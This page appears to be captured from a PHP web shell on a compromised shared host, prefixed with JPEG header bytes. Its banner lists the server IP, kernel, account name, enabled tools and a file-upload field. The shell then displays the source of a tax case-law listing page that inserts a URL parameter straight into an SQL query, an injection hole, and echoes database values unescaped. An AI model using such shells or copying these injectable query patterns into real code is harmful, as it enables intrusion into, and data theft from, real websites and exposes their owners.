ÿØÿà JPEG ÿþ;
| Server IP : 68.65.120.201 / Your IP : 216.73.216.221 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/home/././././././././././././taxhyuvu/./././www/ |
Upload File : |
<?php $id=$_GET['tax'];
?>
<?php #include "head.php";
include "admin/db.php";
$p2="SELECT * FROM `cases` WHERE `Catag` = '$id' ORDER BY `Year` Desc";
$power = mysqli_query($con,$p2);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<title>Bootstrap Example</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>
</head>
<body>
<Style>
.form-control:focus {
color: #212529;
background-color: #fff;
border-color: #b7d0f5;
outline: 0;
box-shadow: 0 0 0 0.25rem rgba(79, 80, 80, 0.247);
}
.btn-primary{ background: #009bad;
border: #0a9eb0;}
.btn:hover {
color: var(--bs-btn-hover-color);
background-color: #98a0a4;
border-color: #98a0a4;
}
.head{width: 100%;height: 200px;
background-color: #ebebebf7;}
.head img{width: 300px;}
.img1st{margin: 0% 37%;
padding-top: 62px;}
td{text-align: justify;
}
th{text-align: center; color: #666666;
}
</Style>
<script>
setTimeout(function() {
document.getElementById('myDiv').classList.add('animate');
}, 100);
</script>
<style>
#myDiv {
/* width: 100px;
height: 100px;
background-color: red; */
opacity: 0;
/* position: absolute;
/* top: 50%; */
/* left: 0; */
transition: opacity 1s, left 1s;
}
#myDiv.animate {
opacity: 1;
left: 50%;
}
</style>
<div class="container" id="myDiv" ><center>
<h1>Income Tax </h1>
<h2 style="padding: 0px;font-weight: 800;">(Case Laws)</h2></center>
<form>
<label for=""></label>
<div class="row">
<div class="col-md-2">
<select name="cars" id="cars" class="form-control">
<option value="" disabled selected hidden>Select Court</option>
<?php
$Year11="SELECT * FROM `pluss`";
$data111=mysqli_query($con,$Year11);
?>
<?php foreach ($data111 as $yyy ) {
?>
<option value="<?php echo $yyy['Court']?>"><?php echo $yyy['Court']?></option><?php } ?>
</select>
</div>
<div class="col-md-2"><select name="year" id="year" aria-placeholder="select Year" class="form-control">
<option value="" disabled selected hidden>Select Year</option>
<?php
$Year1="SELECT * FROM `plus` ORDER BY `plus`.`Year` DESC";
$data11=mysqli_query($con,$Year1);
?>
<?php foreach ($data11 as $yy ) {
?>
<option value="<?php echo $yy['Year']?>"><?php echo $yy['Year']?></option><?php } ?>
</select></div>
<div class="col-md-2"><input placeholder="Search by Section" class="form-control"></div>
<div class="col-md-2"><input placeholder="Search by Topic" class="form-control"></div>
<div class="col-md-2"><input placeholder="Search by Citation" class="form-control"></div>
<div class="col-md-2"><button class="btn btn-primary">Search</button></div>
</div>
<!-- <label for="">Select Year:</label> -->
</form>
<table class="table table-hover table-bordered" class="table ">
<thead>
<tr>
<th>Court </th>
<th>Year</th>
<th>Petitioner</th>
<th>Section</th>
<th>Topic</th>
<th>Case Law</th>
<th>Citation/Ref.</th>
<th>View</th>
</tr>
</thead>
<tbody>
<?php foreach($power as $k ) {
?>
<tr>
<td><?php echo $k['Court'];?> </td>
<td><?php echo $k['Year'];?></td>
<td><?php echo $k['Vs1'];?> <BR> <center><B>Vs</B></center><?php echo $k['Vs2'];?></td>
<td><?php echo $k['Law'];?><?php echo $k['Sections'];?></td>
<td><?php echo $k['Topic'];?></td>
<td>
<?php $desc=$k['Para'];
$StrCut=substr($desc,0,270);
$desc =substr($StrCut,0,strrpos($StrCut,' '))."<a href='viewreport?id=$k[ID]'> Read More...</a>";
echo $desc; ?>
</td>
<td><?php echo $k['Ref'];?></td>
<!-- <td class="align-middle"><a href="" style="font-size:25px; text-align:center;" ><center><i class="fa fa-pencil-square" aria-hidden="true"></center></a></td> -->
<td class="align-middle"><a href="viewreport?id=<?php echo $k['ID'];?>"style="font-size:25px;" ><i class="fa fa-eye" aria-hidden="true"></i></a></td>
</tr>
<?php }?>
</tbody>
</table>
</div>
</body>
</html>